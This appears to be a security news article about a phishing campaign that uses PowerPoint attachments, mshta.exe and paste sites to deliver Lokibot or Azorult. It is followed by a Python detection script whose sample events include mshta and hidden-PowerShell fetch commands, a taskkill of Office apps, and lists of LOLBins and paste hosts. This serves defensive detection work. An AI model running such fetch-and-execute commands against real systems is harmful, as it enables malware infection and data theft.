A hacker using the handle “Master X” was found spreading malware via PowerPoint files whose embedded script contains a reference to the Drake lyric “Kiki, do you love me.”
Master X ran an email-based campaign with a PowerPoint attachment that ultimately delivers one of two malicious payloads: the Lokibot information stealer or Azorult.
Researchers also shared a sample of the malicious emails, dated January 6, 2020, which indicate a Business Email Compromise scam attempt with a call to action in the subject line: “TT Remittance Recommendation”.
The two PowerPoint attachments carry the file names “INVOO13433361.pss” and “Blank slip.pss”.
A security analyst wrote in their blog that “Upon opening either of the PowerPoint attachments, it routinely runs a heavily obscured visual basic script.”
Opening either attachment (“INVOO13433361.pss” or “Clean slip.pss”) triggers a Visual Basic script.
The script makes use of Windows’ native Microsoft HTML Application host, “mshta.exe”, which sends a request to the Bitly link shortener.
Using mshta.exe instead of a browser helps the script circumvent browser security controls and skirt detection.
As its first order of business, it runs a command-line task to kill the Excel and Word applications.
Next, mshta.exe is used to reach the plain-text sharing site Pastebin.com and retrieve an encoded PowerShell script.
Finally, the PowerShell script contacts Paste.ee, another plain-text sharing site, and downloads the code for a malicious executable named Calc.exe.
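The chain described above (an Office application spawning mshta.exe, a request to a link shortener, a taskkill of Excel and Word, a pull from a paste site, and a final binary masquerading as Calc.exe) is easy to express as endpoint detection logic. The following Python script is an added example written for this article; it is not code from the researchers or from the article itself. It assumes process-creation events in a Sysmon-like shape with `parent`, `image` and `cmdline` fields, and the sample events it runs over are constructed for illustration (the URLs and IDs are placeholders, not indicators from the campaign).

```python
"""Added example (not from the article): flag process-creation events that
match the Office -> mshta.exe -> shortener/paste-site -> fake Calc.exe chain.

Events are assumed to be dicts with Sysmon-like fields: parent, image, cmdline.
"""
import re
from typing import Dict, List, Tuple

# Office applications that should rarely spawn scripting hosts.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Living-off-the-land binaries the article's chain relies on.
LOLBIN_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe"}
# Link shorteners and plain-text sharing sites named in the article.
PASTE_OR_SHORTENER_HOSTS = {"bit.ly", "pastebin.com", "paste.ee"}
# Directories where the real calc.exe lives on a 64-bit Windows install.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)
TASKKILL_IMAGE_RE = re.compile(r"/im\s+(\S+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def event_findings(event: Dict[str, str]) -> List[str]:
    """Return a list of finding tags for one process-creation event (empty if benign)."""
    findings: List[str] = []
    parent = basename(event.get("parent", ""))
    image_path = event.get("image", "")
    image = basename(image_path)
    cmdline = event.get("cmdline", "")

    # 1. An Office app launching a scripting host (PowerPoint -> mshta.exe in the article).
    if parent in OFFICE_PARENTS and image in LOLBIN_CHILDREN:
        findings.append(f"office-spawned-lolbin:{parent}->{image}")

    # 2. Any command line that reaches out to a shortener or paste site.
    for host in URL_RE.findall(cmdline):
        if host.lower() in PASTE_OR_SHORTENER_HOSTS:
            findings.append(f"paste-or-shortener-url:{host.lower()}")

    # 3. taskkill aimed at Excel/Word, the chain's "first order of business".
    if image == "taskkill.exe":
        targets = {t.lower() for t in TASKKILL_IMAGE_RE.findall(cmdline)}
        if targets & {"excel.exe", "winword.exe"}:
            findings.append("kills-office-apps")

    # 4. A binary named like the system calculator running outside the system directories.
    if image == "calc.exe" and not image_path.lower().startswith(SYSTEM_DIRS):
        findings.append("system-binary-name-outside-system-dir:calc.exe")

    return findings


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every event that produced at least one finding."""
    results = []
    for index, event in enumerate(events):
        findings = event_findings(event)
        if findings:
            results.append((index, findings))
    return results


# Constructed sample telemetry (placeholder URLs, not real indicators).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://bit.ly/CONSTRUCTED-ID"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": r"taskkill /f /im excel.exe /im winword.exe"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "https://pastebin.com/raw/CONSTRUCTED-ID"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\Calc.exe",
     "cmdline": r"Calc.exe"},
    {"parent": r"C:\Windows\explorer.exe",                # benign control event
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r"chrome.exe https://www.example.com/"},
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(findings)}")
```

Each stage of the chain gets its own tag so an analyst can see which link fired; in practice the Office-spawned-mshta.exe rule alone is the highest-signal one, while the paste-site and calc.exe checks are useful corroboration when the process tree has already been cut by a parent that exited.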